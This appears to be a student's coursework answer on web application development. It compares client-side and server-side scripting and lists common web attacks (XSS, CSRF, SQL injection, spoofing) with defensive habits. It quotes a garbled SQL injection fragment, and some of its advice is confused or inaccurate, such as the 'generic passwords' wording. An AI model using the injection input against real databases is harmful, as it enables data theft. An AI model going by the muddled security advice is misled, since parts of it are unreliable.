Delivery in day(s): 5
Diploma in Computing and Systems Development
Unit Number and Title
Unit 35 Web Application Development
Functions of web applications are:
Major advantages of web applications are:
There are lot many differences in client side and server side web applications. They can be differentiated as follows:
Client Side Scripting Language
Server Side Scripting Language
Client side scripting languages are used to add functionality to the website and make interactive web pages.
Server side scripting languages are used to develop, structure or create the website itself. In PHP there are various CMS (Content management systems like Joomla, cake PHP, Wordpress etc.) available to structure the web application.
Client side programming is the name given to all the scripts that run on client browser.
All the scripts that run on web server are called as server side scripting languages.
The client sends request to web server (e.g. – www.yahoo.com) on behalf of user.
Web server acknowledges the request sent by the user and provides client with some meta data (intermediate data) like page headers and source.
Client side scripting languages do not interact with permanent storage. These interact with local storage like cookies etc.
Server side scripting languages are used to interact with permanent storage like database files etc.
Web browser needs to be script enabled to run these scripts on client computer.
There is no need to enable script over servers.
The source code moves between web server to user’s computers and then runs on web browser.
Script runs directly on web server, HTML pages are generated. This HTML is sent to client browser. An example is interactive websites where user input gets saved in database. Like sign up / login forms.
Examples are: Sun-micro systems Java, open source PHP, Microsoft’ ASP.NET, c#, Ruby on rails, visual basic, c/c++ , Delphi, Perl etc.
Internet has become common medium of doing business and sharing of information. To keep our application secure and less vulnerable to hacking, a programmer must follow certain habits to protect their application from attack:
Cross Site Scripting (XSS) attacks – Attackers sometimes try to inject pieces of malicious code or script in vulnerable web pages. These script either corrupt the entire software program or provide access to the hackers. Such scripts might also redirect the user to phishing website or bad webpage. strip_tags() must be run to remove all the input tags and htmlentities() must be applied to all the data when data is getting executed in browser.
Cross Site Request Forgery Attack – In such kind of attacks, hackers trick the users to make some transaction without their knowledge or trick them to load sensitive information. Eg. In the codes where programmers make use of GET requests. To avoid this there must be some token associated with post request. During login the application must generate this token and store it in session. Whenever any form gets displayed on screen that requires user input, the token must be provided there as hidden input field and must be validated by the application logic.
Error Message – Programmers of software must make use of generic passwords and must not display all the information in one message. Like ‘Username or password incorrect’ instead of ‘username incorrect’ or ‘password incorrect’.
Protect Session Data – Never store sensitive information like passwords and credit card numbers in session as it is always written in temporary file. Best practice is to encrypt the data stored in session. SessionHandlerInterface can be implemented for session persistence in PHP5.4 and above.
Guessing password: Hackers might apply simple tricks to guess passwords if they know administrator or have an idea about database names. Password must be strong enough and must be at least 8 characters long and must be a combination of alphabets, numbers and special characters. Avoid making use of your name as password and generic things around as password as they can be guessed easily.
SQL Injection attack – By making use of SQL injection, useful information can be accessed from the database by attackers. Hackers try to find that area in web application that is not filtered for escape characters. They inject something like ‘/=) or 1=1’ and connect with the database and fetch useful information.
Spoofing: It is possible to create exact replica of the website and lure the users to enter their confidential information into it. There are many hoax emails used by hackers for stealing user information.
Even if you think that your website does not contain any important information that may be useful for hackers, still you have to be careful while building and maintaining them as web applications are never secure enough over internet and are compromised most of the time. Some measures must be taken to safeguard our online application from malicious attacks:
Updation of antivirus: Antivirus software definition must be updated from time to time and executed over web server to safeguard the web application.
Secured Socket Layer (SSL) certification: Secured socket layer is a standard security technology protocol which is used to safeguard the applications over internet. These establish an encrypted link between web server and web browser. While passing confidential information between web server and website or web browser over client computer, it is good practice to make use of secured socket layer.
Secure File upload: Programmers must design their websites in such a way that they must not allow uploading executable files / HTML files as they might contain malicious scripts which might open up complete website when executed on server.